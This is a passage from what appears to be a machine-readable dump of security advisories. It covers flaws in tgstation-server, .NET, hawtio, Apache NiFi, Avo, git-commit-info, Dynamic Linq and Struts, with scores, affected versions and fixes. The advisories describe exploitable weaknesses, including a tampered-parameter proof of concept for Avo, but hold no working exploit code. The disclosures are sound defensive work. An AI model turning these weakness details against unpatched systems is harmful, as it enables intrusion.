https://github.com/tgstation/tgstation-server/commit/2894ea03d708c7f16bab47ba5020c2ad4c3d5554#diff-0ba090ea7073a3a304dfdbdfc512f733R48 authPolicy is passed in by the framework but the documentation for what the parameter is is virtually non-existent: https://docs.microsoft.com/en-us/dotnet/api/system.servicemodel.serviceauthenticationmanager.authenticate?view=netframework-4.7.2#System_ServiceModel_ServiceAuthenticationManager_Authenticate_System_Collections_ObjectModel_ReadOnlyCollection_System_IdentityModel_Policy_IAuthorizationPolicy__System_Uri_System_ServiceModel_Channels_Message__ Turns out it is a cache of what the previously returned policy was, as Floyd thankfully found out for us. The security patch fixes the issue by creating a new empty list as the return value when password authentication fails as opposed to using the authPolicy parameter. If you're wondering why this line: https://github.com/tgstation/tgstation-server/commit/2894ea03d708c7f16bab47ba5020c2ad4c3d5554#diff-0ba090ea7073a3a304dfdbdfc512f733R42 didn't prevent the issue. It only invalidated the actual Windows login session, but in the eyes of the server the user was still valid since we just passed that closed handle as a return result. Had access to static files been attempted with a bad login, the request would end up erroring due to trying to impersonate using a closed user token handle. This has been fixed in 1812a9c6793c8516c138a105ccfb2108164f0eff and versions 3.2.5.0+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'TGServiceInterface'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.1.0'}, {'fixed': '3.2.5.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.2.4.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/tgstation/tgstation-server/security/advisories/GHSA-42r6-p4px-qvv6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-17107'}, {'type': 'WEB', 'url': 'https://github.com/tgstation/tgstation-server/commit/1812a9c6793c8516c138a105ccfb2108164f0eff'}, {'type': 'WEB', 'url': 'https://github.com/tgstation/tgstation-server/commit/2894ea03d708c7f16bab47ba5020c2ad4c3d5554#diff-0ba090ea7073a3a304dfdbdfc512f733'}, {'type': 'WEB', 'url': 'https://docs.microsoft.com/en-us/dotnet/api/system.servicemodel.serviceauthenticationmanager.authenticate?view=netframework-4.7.2#System_ServiceModel_ServiceAuthenticationManager_Authenticate_System_Collections_ObjectModel_ReadOnlyCollection_System_IdentityModel_Policy_IAuthorizationPolicy__System_Uri_System_ServiceModel_Channels_Message__'}, {'type': 'PACKAGE', 'url': 'https://github.com/tgstation/tgstation-server'}, {'type': 'WEB', 'url': 'https://github.com/tgstation/tgstation-server/blob/tgstation-server-v3.2.5.0/TGS.Interface/TGS.Interface.nuspec'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/TGServiceInterface'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T20:30:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-jx7q-xxmw-44vf,2023-06-14T17:04:29Z,2023-06-14T17:04:29Z,,['CVE-2023-24936'],.NET Elevation of Privilege Vulnerability,"# Microsoft Security Advisory CVE-2023-24936: .NET Elevation of Privilege Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET when deserializing a DataSet or DataTable from XML which may result in elevation of privileges. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/259 ### Mitigation factors The default configuration of DataSet and DataTable is not susceptible to this vulnerability. This vulnerability only exists if the app developer or machine admin extends the DataSet and DataTable default allow-list [as specified here](https://learn.microsoft.com/en-us/dotnet/framework/data/adonet/dataset-datatable-dataview/security-guidance) to contain specific types which trigger the vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.5 or earlier. * Any .NET 6.0 application running on .NET 6.0.16 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, < 7.0.5 | 7.0.7 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 6.0.1, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 6.0.0, < 6.0.16 | 6.0.18 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-24936]( https://www.cve.org/CVERecord?id=2023-24936) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-06-13_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-jx7q-xxmw-44vf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24936'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/259'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24936'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:04:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-p223-c4w6-q454,2023-06-08T14:02:02Z,2023-06-01T15:30:59Z,,['CVE-2023-33544'],hawtio vulnerable to Path Traversal,"hawtio 2.17.2 is vulnerable to Path Traversal. it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.hawt:project'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.17.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33544'}, {'type': 'WEB', 'url': 'https://github.com/hawtio/hawtio/issues/2832'}, {'type': 'PACKAGE', 'url': 'https://github.com/hawtio/hawtio'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:03:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-65wh-g8x8-gm2h,2023-06-21T13:48:24Z,2023-06-12T18:30:18Z,,['CVE-2023-34212'],Apache NiFi vulnerable to Deserialization of Untrusted Data,"The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location. The resolution validates the JNDI URL and restricts locations to a set of allowed schemes. You are recommended to upgrade to version 1.22.0 or later which fixes this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.nifi:nifi-jms-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.22.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34212'}, {'type': 'WEB', 'url': 'https://github.com/apache/nifi/pull/7313'}, {'type': 'WEB', 'url': 'https://github.com/apache/nifi/commit/3fcb82ee4509d1ad73893d8dca003be6d086c5d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/nifi'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/NIFI-11614'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/w5rm46fxmvxy216tglf0dv83wo6gnzr5'}, {'type': 'WEB', 'url': 'https://nifi.apache.org/security.html#CVE-2023-34212'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/12/2'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T20:29:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-86h2-2g4g-29qx,2023-06-12T20:09:27Z,2023-06-06T16:46:57Z,,['CVE-2023-34102'],avo possible unsafe reflection / partial DoS vulnerability,"### Summary The polymorphic field type stores the classes to operate on when updating a record with user input, and does not validate them in the back end. This can lead to unexpected behavior, remote code execution, or application crashes when viewing a manipulated record. ### Details After reviewing the polymorphic field implementation and performing some black box approaches, we identified a potential security issue related to the use of safe_constantize / constantize. This Rails functionality is capable of searching for classes within the Rails context and returning the class for further use. Because Avo does not validate user input when updating or creating a new polymorphic resource, it is possible to create database entries with completely different or invalid class names than the preselected ones. Avo assumes that the class specified by the user request is a valid one and attempts to work with it, which may result in dangerous behavior and code execution. ### PoC ![image](https://user-images.githubusercontent.com/26464774/243437854-933d94c8-4ae0-43fe-b2da-35b103e28796.png) _In the test scenario we choose the demo app and the review resource which has a polymorphic reviewable field._ ![image](https://user-images.githubusercontent.com/26464774/243437954-2d947c6d-4e97-4e91-a442-405e553dd047.png) _Intercepting the request and switching the review[reviewable_type] from “Fish” to “File” which is a real class inside Rails_ ![image](https://user-images.githubusercontent.com/26464774/243438031-109de6d0-9370-4318-b18e-c5bcea61cf54.png) _Corrupting the database with unusable classes will cause a crash at the application while viewing the new record or the index view (partial DoS)_ ![image](https://user-images.githubusercontent.com/26464774/243438104-80df5aae-86de-40fc-870d-689a03cae389.png) _Manual delete the corrupted resource in order to recover the applications functionality_ ![image](https://user-images.githubusercontent.com/26464774/243438182-1e7eef54-73ba-47d0-b5df-4bad14859af3.png) _Of course it is possible to use other class names or namespaces. The local development environment displays the backend error message when visiting a corrupted record. Avo is trying to apply a scope to this class that does not exist._ ![image](https://user-images.githubusercontent.com/26464774/243438257-dbb59153-58a8-4421-b796-f2a0f2c20083.png) _Specifying an invalid class name in the parameter will cause the application to crash again while trying constanize the provided string_ ### Impact The final exploitation of this vulnerability requires more time than is provided in this assessment, but initial testing of the post request shows the potential critical risk. The classes could be instantiated at any point in the code and this could also lead to code execution. ### Recommendation Avo should be configured to never trust user-supplied input, especially when defining classes for records. In this particular case, Avo can evaluate the options list given for the polymorphic field and only allow strings from that list. With this white-list approach, an attacker cannot supply unintended classes. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'avo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.33.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.33.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'avo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0.pre1'}, {'last_affected': '3.0.0.pre12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34102'}, {'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/commit/ec117882ddb1b519481bdd046dc3cfa4474e6e17'}, {'type': 'PACKAGE', 'url': 'https://github.com/avo-hq/avo'}, {'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/releases/tag/v2.33.3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/avo/CVE-2023-34102.yml'}]","{'cwe_ids': ['CWE-20', 'CWE-470'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:46:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-h42j-mrmp-9369,2023-06-30T20:32:34Z,2023-06-28T06:30:22Z,,['CVE-2023-26134'],git-commit-info vulnerable to Command Injection,"Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo() fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the hash content.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'git-commit-info'}, 'ecosystem_specific': {'affected_functions': ['git-commit-info']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26134'}, {'type': 'WEB', 'url': 'https://github.com/JPeer264/node-git-commit-info/issues/24'}, {'type': 'WEB', 'url': 'https://github.com/JPeer264/node-git-commit-info/commit/f7c491ede51f886a988af9b266797cb24591d18c'}, {'type': 'PACKAGE', 'url': 'https://github.com/JPeer264/node-git-commit-info'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-GITCOMMITINFO-5740174'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:32:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-w65q-jcmv-28gj,2023-07-03T21:34:40Z,2023-06-22T21:30:49Z,,['CVE-2023-32571'],Dynamic Linq vulnerable to remote code execution,"Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Linq.Dynamic.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.7.10'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32571'}, {'type': 'PACKAGE', 'url': 'https://github.com/zzzprojects/System.Linq.Dynamic.Core'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2023/06/13/dynamic-linq-injection-remote-code-execution-vulnerability-cve-2023-32571/'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-8f6x-v685-g2xc,2023-06-21T21:47:08Z,2023-06-14T09:30:42Z,,['CVE-2023-34149'],Apache Struts vulnerable to memory exhaustion,"Denial of service via out of memory (OOM) owing to not properly checking of list bounds. When a Multipart request has non-file normal form fields, Struts used to bring them into memory as Strings without checking their sizes. This could lead to OOM if developer has set struts.multipart.maxSize to a value equal or greater than the available memory. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.31'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34149'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21'}, {'type': 'WEB', 'url': 'https://cwiki.apache.org/confluence/display/WW/S2-063'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/struts'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_2_5_31'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_6_1_2_1'}, {'type': 'WEB', 'url': 